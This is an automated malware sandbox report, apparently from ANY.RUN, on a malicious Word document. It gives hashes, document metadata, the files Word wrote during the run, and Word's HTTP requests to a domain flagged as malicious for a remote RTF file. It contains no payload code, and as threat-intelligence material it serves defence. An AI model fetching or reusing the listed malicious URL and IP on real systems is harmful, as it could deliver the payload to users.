File name: | 334d50f3ced57bb7540f2498705f3e8897148b4d30816be8b3721c49d2d08fe7 |
Full analysis: | https://app.any.run/tasks/82bdf51d-75e2-427a-80f7-40f59dbbe9f5 |
Verdict: | Malicious activity |
Analysis date: | August 25, 2019, 12:55:24 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/octet-stream |
File info: | Microsoft OOXML |
MD5: | DFAD7D4A7ECB2EED6D69ABFBFB5F94C9 |
SHA1: | 88B3189A1F33A0251272C0E4ADC775E2DB3F4EE5 |
SHA256: | 334D50F3CED57BB7540F2498705F3E8897148B4D30816BE8B3721C49D2D08FE7 |
SSDEEP: | 192:rooBVpXRqFlUbjoqn2VRwvTN81fydFQG4z2lJY26qjC+/5q:VV9RqDUbcc2VRwraQdOoJY26ubq |
.docx | | | Word Microsoft Office Open XML Format document (41.2) |
---|---|---|
.zip | | | Open Packaging Conventions container (30.6) |
.ubox | | | Universe Sandbox simulation (21) |
.zip | | | ZIP compressed archive (7) |
ZipRequiredVersion: | 20 |
---|---|
ZipBitFlag: | - |
ZipCompression: | Deflated |
ZipModifyDate: | 2018:10:12 06:16:09 |
ZipCRC: | 0xeea5f986 |
ZipCompressedSize: | 355 |
ZipUncompressedSize: | 1364 |
ZipFileName: | [Content_Types].xml |
Template: | Normal.dotm |
---|---|
TotalEditTime: | - |
Pages: | 1 |
Words: | 315 |
Characters: | 1802 |
Application: | Microsoft Office Word |
DocSecurity: | None |
Lines: | 15 |
Paragraphs: | 4 |
ScaleCrop: | No |
Company: | - |
LinksUpToDate: | No |
CharactersWithSpaces: | 2113 |
SharedDoc: | No |
HyperlinksChanged: | No |
AppVersion: | 12 |
Keywords: | - |
LastModifiedBy: | Charlie |
RevisionNumber: | 3 |
CreateDate: | 2018:10:11 12:14:00Z |
ModifyDate: | 2018:10:11 12:14:00Z |
Title: | - |
---|---|
Subject: | - |
Creator: | Charlie |
Description: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2928 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\334d50f3ced57bb7540f2498705f3e8897148b4d30816be8b3721c49d2d08fe7.docx" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2928 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR9B79.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2928 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\{D73BD7B1-1F8A-4780-98F8-06CF0D813810} | — | |
MD5:— | SHA256:— | |||
2928 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\{2575BAE7-EBB6-49E2-B391-F12D501D9F7A} | — | |
MD5:— | SHA256:— | |||
2928 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{B53D675E-13FA-4E87-B421-988F04207777}.FSD | binary | |
MD5:E5353058A2EC5518C0521696523D87F8 | SHA256:242B52D08C47FF7104CC80D92C65CB8BAAA82F282A6BCB8E8E1A039CDF3C429D | |||
2928 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSD | binary | |
MD5:C8844EC52F71838969834A48524C7328 | SHA256:63E66985393D853C52CB51D8977FCA9F1ABD79283ADD3A59434F08CCB7AE6489 | |||
2928 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F8253A95.emf | emf | |
MD5:1B76675B86F1433D15822E75F858338F | SHA256:7D3D98835D2C9C355B5C9F1003C18F805EB2955C7AA76A910E3BA34DE7E2EDF6 | |||
2928 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:0A0D31AF62C5D5CF32A1200EEAAB7A92 | SHA256:4245C829DC2746A0D44B7F2B1235F77ABFCA9525FB7BC37F4380AC844B0F5843 | |||
2928 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD | binary | |
MD5:92EB9923F9F9D97FB8B9CA41A6D7D6BF | SHA256:69D8D61AFE8A217F6D560E856DFF124E794637267BE68486E4D20140ED6F5AF7 | |||
2928 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{70C0F995-6473-4D45-9CC8-8D2CC93651F9}.FSD | binary | |
MD5:3287ED50AD00973B30DC72A972ED02BF | SHA256:BA3D70F14FF04B2AF7517F67168C6DBAB69A210DFD7C2B6074100E34CDA82282 | |||
2928 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSF | binary | |
MD5:EE9F72CD24EE377E13A4AB3028BA0E66 | SHA256:C25B5B1DBC26F26057ACC5F8A87A7F793F92EBD9A9FE807FAAB887ABF1C3E6F9 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2928 | WINWORD.EXE | OPTIONS | 200 | 58.158.177.102:80 | http://www.webserv-redir.net/images/67381F0B/-1/5272/3cdc4fcb/ | JP | — | — | malicious |
2928 | WINWORD.EXE | HEAD | — | 58.158.177.102:80 | http://www.webserv-redir.net/images/67381F0B/-1/5272/3cdc4fcb/main.RTF | JP | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2928 | WINWORD.EXE | 58.158.177.102:80 | www.webserv-redir.net | UCOM Corp. | JP | malicious |
Domain | IP | Reputation |
---|---|---|
www.webserv-redir.net |
| malicious |